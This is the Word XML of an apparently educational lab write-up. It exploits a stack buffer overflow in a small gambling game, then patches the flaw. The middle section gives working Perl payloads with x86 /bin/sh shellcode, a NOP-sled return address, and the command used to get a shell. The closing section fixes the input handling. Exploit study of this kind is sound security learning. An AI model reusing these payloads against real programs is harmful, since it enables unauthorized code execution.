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2"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the game, we can see that it is effectively a gambling game. You can play several games to win credits with the odds being against us for each game. There is also a difference in behavior for the first time it is run, where it asks for the user’s name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let’s look at the source code. The first thing to note is the character buffer within the user struct, as well as the current_game pointer declared after.</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723900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4514850" cy="1466850"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="114300"/>
            <wp:docPr id="6"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4514850" cy="1466850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Depending on how the name is copied into the buffer, we could overflow the buffer to overwrite the pointer, so let’s look at how it’s done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It seems the name is written to the buffer until a newline character (\n) is received. This means that if we provide more than 100 characters before we hit enter, we can override the buffer.</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1019175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4876800" cy="942975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="11430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876800" cy="942975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s test it. By playing through the game normally, we put current_game onto the stack. By then changing the user’s name, we can override the current_game with the buffer overflow exploit to point somewhere else. The following shows the game segfaulting as a valid memory address (0x42424242) is not provided: (We can also use Perl to automate the code so we do not have to enter characters every time.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'print "1\n1\nn\n5\n" . "A"x100 . "AAAA\n" . "1\nn\n7\n"' | ./goc.out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943600" cy="4559300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="114300"/>
            <wp:docPr id="4"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943600" cy="4559300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By storing shellcode within the buffer, we can point back to the address of the buffer to run our shellcode to get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first step then becomes finding the address of the buffer when the game is running. We can do so by using nm to look at memory addresses of some of the objects within the code. We see the the player struct when we run it:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:anchor allowOverlap="1" behindDoc="0" distB="114300" distT="114300" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>204788</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1028700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5534025" cy="419100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="11430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534025" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we know the buffer is contained within the player structure, we can guess some addresses that should let us hit our nop sled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After guessing a few addresses, the following address hits our nop sled: 0x0804e09f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After adding our shell code and new address, our Perl command becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'print "1\n19\nn\n5\n" . "A"x47 . "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"  . "\x9f\xe0\x04\x08\n" . "1\n"'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will go ahead and store the string of inputs into a txt file to send to the game using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'print "1\n19\nn\n5\n" . "A"x47 . "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"  . "\x9f\xe0\x04\x08\n" . "1\n"' &gt; exploit_goc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can exploit the program by running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat exploit_goc - | goc.out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The result is a shell. Success!</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352425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3213100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="114300"/>
            <wp:docPr id="7"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943600" cy="3213100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now to patch the program. The problem was a result in the while loop not having a limit to the number of characters being read in, so let’s fix that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rather than looping, we can use scanf to limit the characters read and use strncpy to copy the input into the name buffer, limiting how many characters are copied, and </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2905125" cy="762000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5"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290512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3"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">doubling up on security. The new code for input_name() is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now see that rather than overriding the buffer, any extra characters are treated as a new name, so the exploit is patched.</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685800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5130117" cy="5195888"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="114300"/>
            <wp:docPr id="3"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130117" cy="5195888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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2.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